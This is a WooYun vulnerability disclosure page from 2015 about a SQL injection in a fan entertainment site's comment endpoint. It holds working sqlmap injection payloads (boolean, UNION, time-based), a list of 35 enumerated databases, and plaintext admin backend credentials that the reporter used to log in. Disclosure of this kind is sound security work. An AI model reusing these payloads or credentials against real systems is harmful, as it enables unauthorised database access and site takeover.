当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133783

漏洞标题:粉丝网sql盲注 全部35个数据库千张表

相关厂商:cncert国家互联网应急中心

漏洞作者: 人丑嘴不甜

提交时间:2015-08-17 21:56

修复时间:2015-10-03 10:54

公开时间:2015-10-03 10:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认,细节仅向厂商公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开

简要描述:

粉丝网是以web2.0为基础建立的网上娱乐平台,以博客、社会关系网络等技术为基本应用,以娱乐为方向,搭建一个融合资讯、音频、视频、粉丝群(圈子、俱乐部)的综合互动交流网站。是一个专门为粉丝提供各种服务的专业娱乐网站,并致力于成为中华区最有影响与最大的娱乐门户网站。

详细说明:

注入点是在 http://**.**.**.**/comment/getcommenthtml/?psize=3&page=1&targetid=216&sj=1439398698776 中的targetid处boolean盲注
Place: GET
Parameter: targetid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=1&psize=3&sj=1439398698776&targetid=216 AND 3*2*1=6 AND 838=838 AND 4703=4703
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: page=1&psize=3&sj=1439398698776&targetid=216 AND 3*2*1=6 AND 838=838 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7172786171,0x626f4c79756f446b4b50,0x7179757471),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: page=1&psize=3&sj=1439398698776&targetid=216 AND 3*2*1=6 AND 838=838 AND SLEEP(5)
---
[08:27:34] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL 5.0.11
[08:27:34] [INFO] fetching database names
[08:27:34] [WARNING] reflective value(s) found and filtering out
available databases [35]:
[*] bak
[*] bobo_group_log
[*] bobo_groups
[*] bug
[*] column_7up
[*] dmm
[*] dzhs
[*] feature
[*] gamecenter
[*] group_log
[*] groups
[*] groups09
[*] ichat
[*] idata
[*] idata_bak
[*] idol
[*] ilog
[*] information_schema
[*] ishow
[*] jdata
[*] jlog
[*] kt250
[*] money
[*] moneystate
[*] mysql
[*] new250
[*] openads
[*] paimai
[*] sbgl
[*] special
[*] tangmm
[*] test
[*] treasure
[*] walls
[*] walls_log

360桌面截图20150813083108.jpg

360桌面截图20150813083259.jpg

360桌面截图20150813084353.jpg

360桌面截图20150813130546.jpg


后台地址http://**.**.**.**/admin/login

360桌面截图20150813131217.jpg


用户名 admin
密码 123456qwe
进入后台

360桌面截图20150813131333.jpg

360桌面截图20150813131444.jpg

漏洞证明:

360桌面截图20150813083108.jpg

360桌面截图20150813133357.jpg

修复方案:

过滤

版权声明:转载请注明来源 人丑嘴不甜@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-19 10:53

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-17 10:31 | 粉丝网(乌云厂商)

    您好,我是厂商负责人,看不到您提交的问题,可否发封邮件说明情况:security@ifensi.com